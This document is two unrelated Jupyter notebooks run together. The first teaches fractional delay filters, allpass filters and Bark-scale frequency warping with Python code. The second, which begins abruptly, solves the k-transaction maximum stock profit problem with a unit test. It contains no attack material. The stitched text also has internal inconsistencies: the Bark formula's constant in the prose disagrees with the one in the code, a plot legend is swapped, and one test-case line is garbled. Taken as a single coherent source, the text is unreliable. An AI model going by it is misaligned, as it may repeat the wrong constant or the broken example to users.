We can use such a filter to implement a “**fractional” delay** $d$, where d is a real number, for instance $d=0.5$ if we want to delay a signal by half a sample. In this case we cannot simply use a memory element as in the case of integer delays. In lecture 8 we saw that in this case, our ideal frequency response in the Discrete Time Fourier Transform (DTFT) domain is$$\largeH(e^{j\Omega})=e^{-j\Omega \cdot d}$$To obtain its **ideal impulse response** for a filter design, we apply the inverse DTFT, also as seen in lecture 8,$$\largeh(n)= \frac{1 } {2 \pi} \cdot \int_{\Omega=-\pi} ^ \pi H(e^{j\Omega}) e^{j \Omega n} d \Omega =$$$$\largeh(n)= \frac{1} {2 \pi} \cdot \int _ {\Omega=-\pi} ^ \pi e^{-j \Omega d} e^{j \Omega n} d \Omega =$$$$\large= \frac{1} {2 \pi} \cdot \int _ {\Omega=-\pi} ^ \pi e^{j \Omega(-d+n)} d \Omega =$$$$\large = \frac{1} {2 \pi} \cdot \left( \frac{1} {j \cdot (-d+n)} e^{j \pi (-d+n)} - \frac{1} {j \cdot (-d+n)} e^{-j \pi (-d+n)} \right) =$$using $e^{j \cdot x}-e^{-j \cdot x}=2 \cdot j \cdot sin(x)$ we obtain:$$\large=\frac{1} { 2 \cdot \pi \cdot j \cdot (-d+n) } \cdot 2 \cdot j \cdot sin( \pi \cdot (-d+n) )=$$$$\large=\frac{1} { \pi \cdot (-d+n) } \cdot sin( \pi \cdot (-d+n) )=$$$$\largesinc( -d+n )$$ This means our ideal impulse response is simply a **sinc function**, shifted by d! For the case of an integer delay d this degenerates to a 1 at the d’th position of our impulse response, and zeros elsewhere. To make this an FIR filter, we need to apply a “**window function**”, as described in the lecture “Multirate Signal Processing”. **Example:** The window function is a sine window:$w(n)=sin(\frac{\pi} { L} \cdot ( n+0.5))$, with n=0..L-1, and L: length of the window. This avoids having sudden ends of the impulse response. We also want to keep the most significant parts of our sinc function, the keep the resulting error small. The samples we drop should be small. To include some of the significant values of the sinc function at negative n, we need to shift it to positive indices (by $n_0$) to make it causal. In this way, we obtain our impulse response,$$\largeh(n)=sinc(-d+n-n_0) \cdot w(n)$$ **Python example:**Take $L=10, n_0=4$
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/BZv6wgx7PD4" frameborder="0" allow="accelerometer;
encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
%matplotlib inline
from sympy import init_printing
init_printing()
import numpy as np
import matplotlib.pyplot as plt
#time index range:
L=10
n=np.arange(L)
print('n:',n)
w=np.sin(np.pi/L*(n+0.5))
plt.figure()
plt.plot(w)
plt.plot(np.sinc(-0.5+n-4))
h=w*np.sinc(-0.5+n-4)
plt.plot(h)
plt.legend(('Sine Window', 'Sinc Function', 'Windowed SincFunction'),bbox_to_anchor=(1.04,1), loc="upper left")
plt.title('The Shifted Windowed Sinc Function')
plt.grid()
plt.figure()
x=np.hstack((np.arange(4),np.zeros(8)))
plt.plot(x)
import scipy.signal as sp
y=sp.lfilter(h,1,x)
plt.plot(y)
plt.legend(('Original Signal','Shifted signal, by 4.5 samples'),bbox_to_anchor=(1.04,1), loc="upper left")
plt.title('The Test Signal, Shifted by our Filter by 4.5 Samples')
plt.grid()
#Test with longer filter, to reduce errors:
plt.figure()
L=20
n=np.arange(L)
w=np.sin(np.pi/L*(n+0.5))
plt.plot(np.sinc(-0.5+n-9))
h=w*np.sinc(-0.5+n-9)
plt.plot(h)
plt.legend(('The Shifted Sinc Function','The Shifted Windowed SincFunction'),bbox_to_anchor=(1.04,1), loc="upper left")
plt.title('The Shifted Sinc Function')
plt.grid()
plt.figure()
x=np.hstack((np.arange(4),np.zeros(12)))
y=sp.lfilter(h,1,x)
plt.plot(x)
plt.plot(y)
plt.legend(('Shifted signal, by 9.5 samples', 'Original Signal'),bbox_to_anchor=(1.04,1), loc="upper left")
plt.title('The Test Signal, Shifted by our Filter by 9.5 Samples')
plt.grid()
###Output
n: [0 1 2 3 4 5 6 7 8 9]
###Markdown
**Observe:** The longer we make the filter, keeping the mainlobe of the sinc function in the center, the smaller theresulting error for the shifted signal x becomes, but thehight of the ripples remains similar.
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/krAMLN7tF0M" frameborder="0" allow="accelerometer;
encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
from scipy.signal import freqz
import numpy as np
from matplotlib.ticker import FuncFormatter, MultipleLocator
w, h_response = freqz(h)
fig=plt.figure(figsize=(10,8))
fig.suptitle('Frequency Response', fontsize=16)
plt.subplot(2,1,1)
plt.plot(w, 20 * np.log10(abs(h_response)), 'b')
plt.ylabel('Amplitude (dB)')
plt.xlabel('Normalized Frequency')
plt.grid()
'''ax = plt.gca()
ax.xaxis.set_major_formatter(FuncFormatter(
lambda val,pos: '{:.0g}$\pi$'.format(val) if val !=0 else '0'
))
ax.xaxis.set_major_locator(MultipleLocator(base=0.2))'''
plt.subplot(2,1,2)
angles = np.angle(h_response)
plt.plot(w, angles, 'g')
'''plt.ylabel('Angle (radians)')
plt.xlabel('Normalized Frequency')
ax = plt.gca()
ax.xaxis.set_major_formatter(FuncFormatter(
lambda val,pos: '{:.0g}$\pi$'.format(val) if val !=0 else '0'
))
ax.xaxis.set_major_locator(MultipleLocator(base=0.2))'''
plt.grid()
###Output
_____no_output_____
###Markdown
**Observe** the phase plot at normalized frequency.Remember: Angle= -d Omega, for a delay d,hence d= -Angle/Omega, the negative slope.Also observe that the magnitude deviates from 0 dB athigh frequencies at about above normalized frequency 2.8.To estimate the obtained delay (for verification), we usethe mouse, got to y=-3.14, which is the first wrap aroundpoint, and read out position x=0.32. From that we obtainthe delay d= -y/x=3.14/0.32=9.8, which is indeed roughlythe desired 9.5 samples delay. Observe that our calculationfrom the plot is only a rough estimation.This gives us a **tool for fractional delays!**But we have this attenuation at high high frequencies.IIR filters can improve our filters performance.
###Code
# Delay:
peaks, _ = sp.find_peaks(-angles, height=0)
-angles[peaks[0]]/w[peaks[0]]
###Output
_____no_output_____
###Markdown
IIR Fractional Delay Filter Design In “I. Senesnick, “Low-pass filters realizable as allpasssums: design via a new flat delay filter,” inIEEE Transactions on Circuits and Systems II:Analog and Digital Signal Processing, vol. 46,1999” we found a way to design fractional delay IIR allpassfilters. https://ieeexplore.ieee.org/document/749080
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/-_-k_o3CLpc" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
%%html
<iframe src='https://ieeexplore.ieee.org/document/749080/references#references', width=800, height=400></iframe>
###Output
_____no_output_____
###Markdown
As a Python function it is,
###Code
def allp_delayfilt(tau):
'''
produces a Fractional-delay All-pass Filter
Arguments: tau: fractional delay in samples (float).
:returns:
a: Denominator of the transfer function
b: Numerator of the transfer function
'''
L = int(tau)+1
n = np.arange(0,L)
a_0 = np.array([1.0])
a = np.array(np.cumprod( np.divide(np.multiply((L -
n), (L-n-tau)) , (np.multiply((n+1), (n+1+tau))))))
a = np.append(a_0, a) # Denominator of the transfer function
b = np.flipud(a) # Numerator of the transfer function
return a, b
#testing the fractional delay allpass filter
import matplotlib.pyplot as plt
import scipy.signal as sp
#fractional delay of 5.5 samples:
a,b=allp_delayfilt(5.5)
x=np.hstack((np.arange(4),np.zeros(8)))
y=sp.lfilter(b,a,x) #applying the allpass filter
plt.figure(figsize=(10,8))
plt.title('The IIR Fractional Delay Filter Result')
plt.xlabel('Samples')
plt.plot(x, label='Original Signal')
plt.plot(y, label='Delayed Signal')
plt.grid()
plt.legend(bbox_to_anchor=(1.04,1), loc="upper left");
###Output
_____no_output_____
###Markdown
**Observe** that the extrapolated zero crossing of the orangedelayed signal would indeed be at around 5.5 samples.Also observe that particularly before our signal we nowhave **fewer ripples**.
###Code
# Frequency Response
from scipy.signal import freqz
import numpy as np
from matplotlib.ticker import FuncFormatter, MultipleLocator
w, h_response = freqz(b,a)
fig=plt.figure(figsize=(10,8))
fig.suptitle('Frequency Response', fontsize=16)
plt.subplot(2,1,1)
plt.plot(w/np.pi, 20 * np.log10(abs(h_response)), 'b')
#plt.ylim((-0.001,0.001))
plt.ylabel('Amplitude (dB)')
plt.xlabel('Normalized Frequency')
plt.grid()
ax = plt.gca()
ax.xaxis.set_major_formatter(FuncFormatter(
lambda val,pos: '{:.0g}$\pi$'.format(val) if val !=0 else '0'
))
ax.xaxis.set_major_locator(MultipleLocator(base=0.2))
plt.subplot(2,1,2)
angles = np.angle(h_response)
plt.plot(w/np.pi, angles, 'g')
plt.ylabel('Angle (radians)')
plt.xlabel('Normalized Frequency')
ax = plt.gca()
ax.xaxis.set_major_formatter(FuncFormatter(
lambda val,pos: '{:.0g}$\pi$'.format(val) if val !=0 else '0'
))
ax.xaxis.set_major_locator(MultipleLocator(base=0.2))
plt.grid()
###Output
_____no_output_____
###Markdown
Now we obtain a nice impulse response or set of coefficients hmin and its frequencies response is: **Observe** that the magnitude is practically precisely at 0 dB,except for rounding errors, meaning a gain factor of 1.**Observe** the phase plot at normalized frequency, put themouse over Omega=0.5. The angle is -2.8 radiants.Remember: Angle= -d Omega, for a delay d,hence d= -Angle/Omega = 2.8/0.5=5.6.This fits nicely to our desired delay of 5.5 samples!
###Code
# Delays
peaks, _ = sp.find_peaks(-angles, height=0)
-angles[peaks[0]]/w[peaks[0]]
###Output
_____no_output_____
###Markdown
Application example: Stereo source separation, with 2sources and 2 microphones. We want to cancel one of the2 sources, and for that we need to model the precise delayfrom one microphone to the other to be able to removethe signal by subtraction. See e.g.: - Oleg Golokolenko and Gerald Schuller: "FAST TIME DOMAIN STEREO AUDIO SOURCE SEPARATION USING FRACTIONAL DELAY FILTERS", 147th AES Convention, October, 2019, 16 – 19, New York, NY, USA - Oleg Golokolenko, Gerald Schuller: "A FAST STEREO AUDIO SOURCE SEPARATION FOR MOVING SOURCES", Asilomar Conference on Signals, Systems, and Computers, Nov 3-6, 2019, Asilomar, CA, USA Simple IIR Allpass Filters The simplest allpass filter has one pole and one zero in the z-domain for the transfer function, $$\largeH_{ap}(z)=\frac{z^{-1} -\bar{ a} } {1 -a z^{-1}}=\frac{-\bar{ a} (1- \frac{z^{-1} } {\bar {a}}) } {1 -a z^{-1}}$$ where $a$ is a complex number, and $\bar{a}$ specifies the conjugate complex number.Observe that here we have a zero at $z=\frac{1}{a}$ and a pole at $z=a$! **The pole and the zero are at conjugate reverse locations!**
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/_SzJLFPuBig" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
###Output
_____no_output_____
###Markdown
**Example:** If a=0.5, we obtain the pole/zero plot with Python,
###Code
def zplane(B,A):
# Plot Poles and Zeros
from matplotlib import patches
plt.figure(figsize=(10,8))
ax = plt.subplot(111)
r = 2.5; plt.axis('scaled'); plt.axis([-r, r, -r, r])
#ticks = [-1, 1]; plt.xticks(ticks); plt.yticks(ticks)
# Unit Circle
uc = patches.Circle((0,0), radius=1, fill=False, color='black', ls='dashed')
ax.add_patch(uc)
ax.spines['left'].set_position('center')
ax.spines['bottom'].set_position('center')
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
plt.xlabel('Re', horizontalalignment='right', x=1.0)
plt.ylabel('Im', y=1.0)
plt.title('Complex z-Plane', loc='right')
plt.grid()
plt.plot(np.real(A),np.imag(A),'rx')
plt.plot(np.real(B),np.imag(B),'bo')
a=0.5; #Pole location
B=[1/a.conjugate()]; #the zero location
A=[a];
zplane(B,A); #plot the pole/zero diagram with axis limits
###Output
_____no_output_____
###Markdown
In this plot, the cross at 0.5 is the pole, and the circle at 2 is the zero.How can we see that the magnitude of the frequency response $H(e^{j \cdot \Omega})$ is 1? We can re-write it as$$\largeH_{ap}(e^{j \Omega})=\frac{e^{-j \Omega} -\bar{ a}} {1 -a e^{-j \Omega}}=e^{-j \Omega}\frac{1 -\bar {a} e^{j \Omega}} {1 -a e^{-j \Omega}}$$Here you can see that the expression in the numerator is the **conjugate complex** of the denominator, hence their **magnitude** cancels to **one**. The exponential before the fraction also has magnitude 1, hence the entire expression has magnitude 1,$$\large\mid{H_{ap}(e^{j}\Omega)}\mid=1$$Here we can see, using just 1 pole and one zero, we can obtain a magnitude of constant 1.More interesting now is the resulting phase. The phase function can be found in the book Oppenheim/Schafer, “Discrete Time Signal Processing”:$$\large\begin{equation}\phi(\Omega)=- \Omega - 2 arctan \left(\frac{r sin(\Omega-\theta)} {1 - r cos(\Omega-\theta)} \right)\end{equation}$$ where r is the magnitude of a and $\theta$ is the phase angle of a (hence $a=r\cdot e^{j \theta}$).Observe that so far we assumed the phase to be linearly dependent on the frequency ($\phi(\Omega=-\Omega \cdot d)$), and here we see it to be quite non-linear, with the trigonometric functions!We can now plot the resulting phase over the normalized frequency, and compare it with the phase of a delay of 1 sample (of $z^{-1}$), where we get $\phi(\Omega)=-\Omega$. This can be seen in the following plot, for $a=0.5$ and $a=-0.5$:
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/Mbk8-zRg-9o" frameborder="0" allow="accelerometer;
encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
# For Google Colab
import sys
if 'google.colab' in sys.modules:
!pip install matplotlib==3.1.3
from sympy import symbols, I , E, conjugate, Abs
from sympy.functions import arg
from sympy.plotting import plot
a = symbols('a', complex=True)
omega, r = symbols('\Omega r', real=True)
Hap=(E**(-I*omega)-conjugate(a))/(1-a*E**(-I*omega))
print('Hap=')
display(Hap)
print('Magnitude=')
display(Abs(Hap))
print('For a = 0.5, |Hap| =')
display(Abs(Hap.subs(a,-0.5)))
print('Phase:')
phase=arg(Hap.subs(a,r*E**(I*omega)))
p = plot(arg(Hap.subs(a,-0.5)),arg(Hap.subs(a,0)),arg(Hap.subs(a,0.5)), (omega,0,np.pi), show = False, legend = True)
p[0].line_color = 'green'
p[0].label = 'a=- 0.5'
p[1].line_color = 'red'
p[1].label = 'a=0'
p[2].line_color = 'blue'
p[2].label = 'a=0.5'
p.show()
###Output
Hap=
###Markdown
Here, the blue line is the allpass phase for a=0.5, the green line for a=-0.5, and the red line is for a=0, the phase of a pure 1 sample delay $z^{-1}$. Here it can be seen that the beginning and end of the curves are identical (at frequencies 0 and pi), and only in between the allpass phase deviates from the 1 sample delay! For a=0 the allpass indeed becomes identical to $z^{-1}$, a delay of 1 sample. So we can see that it behaves very **similar to a delay**.Such an IIR allpass filter can also be used to implement **fractional delays**. In the above plot, observe the different **slopes** or **derivatives** of the phase function with respect to frequency, which shows different **group delays** for different coefficients a. For instance the green curve for a=-0.5 at frequencies below about half Nyquist frequency has a slope which is about a third of the slope of the red curve for a delay of 1 sample, and hence represents a fractional delay.This application is described more detailed e.g. in:T. I. Laakso, V. Välimäki, M. Karjalainen, and U. K. Laine.Splitting the unit delay. IEEE SignalProcessing Magazine, 13(1):30–60, January 1996.
###Code
%%html
<iframe src='https://ieeexplore.ieee.org/document/482137', width=800, height=400></iframe>
###Output
_____no_output_____
###Markdown
Frequency Warping
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/EH6UWE7sauI" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
###Output
_____no_output_____
###Markdown
For a=0.5 (the blue curve) we observe a **“streching”** of the low frequency range, where a small part of the low frequencies strech over a wider phase range than the other curves. For the frequency warping we will interpret the negative phase as a normalized frequency.The plot can also be produced with a simple Python function for the phase function:
###Code
def warpingphase(w, a):
#produces (outputs) phase wy for an allpass filter
#w: input vector of normlized frequencies (0..pi)
#a: allpass coefficient
#phase of allpass zero/pole :
theta = np.angle(a);
#magnitude of allpass zero/pole :
r = np.abs(a);
wy = -w-2*np.arctan((r*np.sin(w-theta))/(1-r*np.cos(w-theta)));
return wy
w=np.arange(0,3.14,0.01)
plt.figure()
plt.plot(w,warpingphase(w,0.5))
plt.plot(w,warpingphase(w,0))
plt.plot(w,warpingphase(w,-0.5))
plt.grid()
plt.xlabel('Normalized Frequency')
plt.ylabel('Phase Angle');
###Output
_____no_output_____
###Markdown
The **phase** at the output of our phase function can also be **interpreted as a normalized frequency**. This means its **output** can be the **input** of another warpingphase function.An interesting observation is, that the warpingphase function with coefficient $-\bar{a}$ is the inverse of the warpingphase function with coefficient $a$! We can try this in Python:
###Code
import matplotlib.pyplot as plt
#from warpingphase import *
#frequency range:
w = np.arange(0,np.pi, 0.01)
a = 0.5 * (1+1j)
wyy = (warpingphase(warpingphase(w,a), -a.conjugate()))
plt.figure()
plt.plot(w,wyy)
plt.xlabel('Normalized Frequency')
plt.ylabel('Phase Angle')
plt.show()
###Output
_____no_output_____
###Markdown
Here we see that it is indeed the **identity** function. This shows that interpreting the allpass as a normalized frequency “warper”, the allpass with coefficient $a$ is inverse to the allpass with $-\bar{a}$. What is the frequency response of an example allpass filter? For $a=0.5$, we can use ```freqz```.There we expect to see the magnitude to be contant 1, and the phase angle like we saw from our phase formula for Oppenheim, Schafer, (eq. 1). This also allows “cross-checking” the results!Looking at the z-transform: $$\large H_{ap}(z)=\frac{z^{-1} -\bar{ a} } {1 -a z^{-1}} $$we get our coefficient vectors to`a=0.5;B=[-a.conjugate(), 1];A=[1, -a];`(observe that for freqz the higher exponents of $z^{-1}$ appear to the right)Now we plot the frequency response and impulse response:
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/fDjerT8uCvU" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
a=0.5;
B=[-a.conjugate(), 1];
A=[1, -a];
# Frequency Response
from scipy.signal import freqz
import numpy as np
from matplotlib.ticker import FuncFormatter, MultipleLocator
w, h_response = freqz(B,A)
fig=plt.figure(figsize=(10,8))
fig.suptitle('Frequency Response', fontsize=16)
plt.subplot(2,1,1)
plt.plot(w/np.pi, 20 * np.log10(abs(h_response)), 'b')
#plt.ylim((-0.001,0.001))
plt.ylabel('Amplitude (dB)')
plt.xlabel('Normalized Frequency')
plt.grid()
ax = plt.gca()
ax.xaxis.set_major_formatter(FuncFormatter(
lambda val,pos: '{:.0g}$\pi$'.format(val) if val !=0 else '0'
))
ax.xaxis.set_major_locator(MultipleLocator(base=0.2))
plt.subplot(2,1,2)
angles = np.angle(h_response)
plt.plot(w/np.pi, angles, 'g')
plt.ylabel('Angle (radians)')
plt.xlabel('Normalized Frequency')
ax = plt.gca()
ax.xaxis.set_major_formatter(FuncFormatter(
lambda val,pos: '{:.0g}$\pi$'.format(val) if val !=0 else '0'
))
ax.xaxis.set_major_locator(MultipleLocator(base=0.2))
plt.grid()
###Output
_____no_output_____
###Markdown
Here we can see in the above plot of the magnitude, that we indeed obtain a constant 1 (which is 0 dB, 2e-15 comes from the finite accuracy and rounding errors), and that we have the **non-linear** phase in the lower plot, as in the phase plots before.To obtain the impulse response, we can use the function “lfilter”, and input a unit impulse into it.
###Code
from scipy import signal as sp
Imp = np.zeros(21)
Imp[0] = 1
h = sp.lfilter(B, A, Imp)
plt.figure(figsize=(8,6))
plt.plot(h)
plt.title('Impulse Response of our IIR Allpass with a=0.5')
plt.xlabel('Sample')
plt.ylabel('Value')
plt.grid()
###Output
_____no_output_____
###Markdown
Here we can see that we have the first, non-delayed, sample not at zero, but at -0.5. This can also be seen by plotting the first 4 elements of our impulse response:`print h[0:4]ans =[-0.5 0.75 0.375 0.1875]`The second element corresponds to the delay of 1 sample, our $z^{-1}$, with a factor of 0.75. But then there are more samples, going back into the past, exponentially decaying. This means, not only the past samples goes into our filtering calculation, but also more past samples, and even the **non-delayed** sample, with a factor of -0.5. This is actually a problem for the so-called frequency warping (next section), if we want to use frequency warping in IIR filters, because here we would get delay-less loops, which are difficult to implement! (With **FIR filters** this is **no problem** though) Frequency Warping These properties of the allpass can now be used to “warp” the frequency scale of a filter (by effectively replacing $e^{j\Omega} \leftarrow e^{j\phi (\Omega)}$ in our frequency response), for instance to map it according to the so-called **Bark scale**, used in psycho-acoustics.A common approximation of the Bark scale is$$\largeBark=13 \cdot arctan(0.0076 \cdot f) + 3.5 \cdot arctan\left(\left(\dfrac{f}{7500}\right)^2\right)$$(From Wikipedia, Bark scale, the approximation goes back to Zwicker and Terhard), where f is the frequency in Hz. The Bark scale can be seen as an approximation of the changing frequency resolution over frequency of the inner ear filters of the human ears cochlea.Because of the structure of our chochlea, the ear has different sensitivites for different frequencies and different signals. The signal dependent threshold of audibility of the ear is called the **Masking Threshold**. It has more spectral detail at lower than at higher frequencies, according to the Bark scale.We can plot the Bark formula using the python:
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/-toXcoqWHRE" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
#Frequency array between 0 and 20000 Hz in 1000 steps:
f=np.linspace(0,20000,1000)
#Computation of Zwickers Bark approximation formula:
z=13*np.arctan(0.00076*f)+3.5*np.arctan((f/7500.0)**2)
#plot Bark over Hertz:
plt.figure(figsize=(8,6))
plt.plot(f,z)
plt.xlabel('Frequency in Hertz')
plt.ylabel('Frequency in Bark')
plt.title('Zwicker&Terhard Approximation')
plt.grid()
###Output
_____no_output_____
###Markdown
Here we can see, that 1 bark at lower frequency has a much lower bandwidth than at higher frequencies. This means the ear can be seen as having a higher frequency resolution at lower frequencies than at higher frequencies. Imagine, we want to **design a filter** or system for **hearing purposes**, for instance, we would like to model the masking threshold of the ear for any given signal by some linear filter (FIR or IIR). Then it would be useful, to give this filter a **higher frequency resolution at lower frequencies**, such that it matches the smaller details of the **masking threshold** at lower frequencies. But if we look at the **usual design methods**, they distribute the filter **details independent of the frequency range** (for instance what we saw with the remez method, where we have equally distributed ripples). Here we can now use frequency warping, such that we **enlarge the low frequency range** and shrink the high frequency range accordingly, such that our filter now works on the **warped frequency**, and **“sees”** the **lower frequencies in more detail**, the lower frequencies are more spread out in comparison to the higher frequencies. **How do we do this?** For some frequency response $H(e^{j\Omega})$ we would like to warp the frequency $\Omega$ with some function $\phi(\Omega)$ according to our desired frequency scale, such that we get$$\largeH(e^{j\cdot \phi (\Omega)})$$But this is exactly the principle of an **allpass filter**, which has the frequency response$$\largeH_{ap}(e^{j \Omega})=e^{j \cdot \phi_{ap}(\Omega)}$$ Usually we would like to map positive frequencies to again positive frequencies, and we saw that $\phi_{ap}(\Omega)$ becomes negative, hence we take the approach to **replace z** in the argument of our transfer function with the reverse of our **allpass** transfer function:$$\largez^{-1}\leftarrow H_{ap}(a,z)$$This is replacing all delays of our filter to be warped by our allpass filter.In this way we replace our linear function on the unit circle in z with the non-linear, warped function on the unit circle $H_{ap}$.Hence we get the warped transfer function as:$$\largeH_{warped}(z)=H(H_{ap}( a,z)^{-1})$$and the resulting frequency response becomes:$$\largeH_{warped}(e^{j \Omega})=H(e^{-j \cdot \phi_{ap}(\Omega)})$$Here we can now see that we obtained the **desired frequency warping.**What does this mean for the filter implementation? We know that our FIR filters always consist of many delay elements $z^{-1}$.
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/2arqHPweD5I" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
###Output
_____no_output_____
###Markdown
**Example:** Take an FIR filter,$$\largeH(z)= {\sum _{m=0} ^ L b(m) \cdot z^{-m}} $$its warped version is:$$\largeH(H_{ap}(a,z)^{-1})= {\sum_ {m=0} ^ L b(m) \cdot H^{m}_{ap}(a,z)} $$To obtain a desired filter, we now first have to **warp our desired filter**, and then **design** our filter in the **warped domain**.Observe that the warping turns an **FIR filter into an IIR filter**, because the allpass has poles outside of zero.An example of this kind of design can be seen in the following picture.(From [1])Here we can see that the 12th order filter successfully approximated the more detailed curve at low frequencies, using the warping approach. - [1] Julius O. Smith and Jonathan S. Abel, “Bark and ERB Bilinear Transforms,” IEEE Transactions on Speech and Audio Processing, vol. 7, no. 6, pp. 697 – 708, November 1999. - [2] S. Wabnik, G. Schuller, U. Kraemer, J. Hirschfeld: "Frequency Warping in Low Delay Audio Coding", IEEE International Conference on Acoustics, Speech, and Signal Processing, Philadelphia, PA, March 18–23, 2005
###Code
###Output
_____no_output_____ |
recursion_dynamic/max_profit_k/max_profit_solution.ipynb | ###Markdown
This notebook was prepared by [Donne Martin](https://github.com/donnemartin). Source and license info is on [GitHub](https://github.com/donnemartin/interactive-coding-challenges). Solution Notebook Problem: Given a list of stock prices on each consecutive day, determine the max profits with k transactions.* [Constraints](Constraints)* [Test Cases](Test-Cases)* [Algorithm](Algorithm)* [Code](Code)* [Unit Test](Unit-Test) Constraints* Is k the number of sell transactions? * Yes* Can we assume the prices input is an array of ints? * Yes* Can we assume the inputs are valid? * No* If the prices are all decreasing and there is no opportunity to make a profit, do we just return 0? * Yes* Should the output be the max profit and days to buy and sell? * Yes* Can we assume this fits memory? * Yes Test Cases* Prices: None or k: None -> None* Prices: [] or k []* Prices: [0, -1, -2, -3, -4, -5] * (max profit, list of transactions) * (0, [])* Prices: [2, 5, 7, 1, 4, 3, 1, 3] k: 3 * (max profit, list of transactions) * (10, [Type.SELL day: 7 price: 3, Type.BUY day: 6 price: 1, Type.SELL day: 4 price: 4, Type.BUY day: 3 price: 1, Type.SELL day: 2 price: 7, Type.BUY day: 0 price: 2]) AlgorithmWe'll use bottom up dynamic programming to build a table.The rows (i) represent the prices.The columns (j) represent the number of transactions (k).T[i][j] = max(T[i][j - 1], prices[j] - price[m] + T[i - 1][m])m = 0...j-1 0 1 2 3 4 5 6 7--------------------------------------| | 2 | 5 | 7 | 1 | 4 | 3 | 1 | 3 |--------------------------------------| 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 || 1 | 0 | 3 | 5 | 5 | 5 | 5 | 5 | 5 || 2 | 0 | 3 | 5 | 5 | 8 | 8 | 8 | 8 || 3 | 0 | 3 | 5 | 5 | 8 | 8 | 8 | 10 |--------------------------------------Optimization:max_diff = max(max_diff, T[i - 1][j - 1] - prices[j - 1])T[i][j] = max(T[i][j - 1], prices[j] + max_diff)Complexity:* Time: O(n * k)* Space: O(n * k) Code
###Code
from enum import Enum # Python 2 users: Run pip install enum34
class Type(Enum):
SELL = 0
BUY = 1
class Transaction(object):
def __init__(self, type, day, price):
self.type = type
self.day = day
self.price = price
def __eq__(self, other):
return self.type == other.type and \
self.day == other.day and \
self.price == other.price
def __repr__(self):
return str(self.type) + ' day: ' + \
str(self.day) + ' price: ' + \
str(self.price)
import sys
class StockTrader(object):
def find_max_profit(self, prices, k):
if prices is None or k is None:
raise TypeError('prices or k cannot be None')
if not prices or k <= 0:
return []
num_rows = k + 1 # 0th transaction for dp table
num_cols = len(prices)
T = [[None] * num_cols for _ in range(num_rows)]
for i in range(num_rows):
for j in range(num_cols):
if i == 0 or j == 0:
T[i][j] = 0
continue
max_profit = -sys.maxsize
for m in range(j):
profit = prices[j] - prices[m] + T[i - 1][m]
if profit > max_profit:
max_profit = profit
T[i][j] = max(T[i][j - 1], max_profit)
return self._find_max_profit_transactions(T, prices)
def find_max_profit_optimized(self, prices, k):
if prices is None or k is None:
raise TypeError('prices or k cannot be None')
if not prices or k <= 0:
return []
num_rows = k + 1
num_cols = len(prices)
T = [[None] * num_cols for _ in range(num_rows)]
for i in range(num_rows):
max_diff = prices[0] * -1
for j in range(num_cols):
if i == 0 or j == 0:
T[i][j] = 0
continue
max_diff = max(
max_diff,
T[i - 1][j - 1] - prices[j - 1])
T[i][j] = max(
T[i][j - 1],
prices[j] + max_diff)
return self._find_max_profit_transactions(T, prices)
def _find_max_profit_transactions(self, T, prices):
results = []
i = len(T) - 1
j = len(T[0]) - 1
max_profit = T[i][j]
while i != 0 and j != 0:
if T[i][j] == T[i][j - 1]:
j -= 1
else:
sell_price = prices[j]
results.append(Transaction(Type.SELL, j, sell_price))
profit = T[i][j] - T[i - 1][j - 1]
i -= 1
j -= 1
for m in range(j + 1)[::-1]:
if sell_price - prices[m] == profit:
results.append(Transaction(Type.BUY, m, prices[m]))
break
return (max_profit, results)
###Output
_____no_output_____
###Markdown
Unit Test
###Code
%%writefile test_max_profit.py
from nose.tools import assert_equal
from nose.tools import assert_raises
from nose.tools import assert_true
class TestMaxProfit(object):
def test_max_profit(self):
stock_trader = StockTrader()
assert_raises(TypeError, stock_trader.find_max_profit, None, None)
assert_equal(stock_trader.find_max_profit(prices=[], k=0), [])
prices = [5, 4, 3, 2, 1]
k = 3
assert_equal(stock_trader.find_max_profit(prices, k), (0, []))
prices = [2, 5, 7, 1, 4, 3, 1, 3]
profit, transactions = stock_trader.find_max_profit(prices, k)
assert_equal(profit, 10)
assert_true(Transaction(Type.SELL,
day=7,
price=3) in transactions)
assert_true(Transaction(Type.BUY,
day=6,
price=1) in transactions)
assert_true(Transaction(Type.SELL,
day=4,
price=4) in transactions)
assert_true(Transaction(Type.BUY,
day=3,
price=1) in transactions)
assert_true(Transaction(Type.SELL,
day=2,
price=7) in transactions)
assert_true(Transaction(Type.BUY,
day=0,
price=2) in transactions)
print('Success: test_max_profit')
def main():
test = TestMaxProfit()
test.test_max_profit()
if __name__ == '__main__':
main()
%run -i test_max_profit.py
###Output
Success: test_max_profit
###Markdown
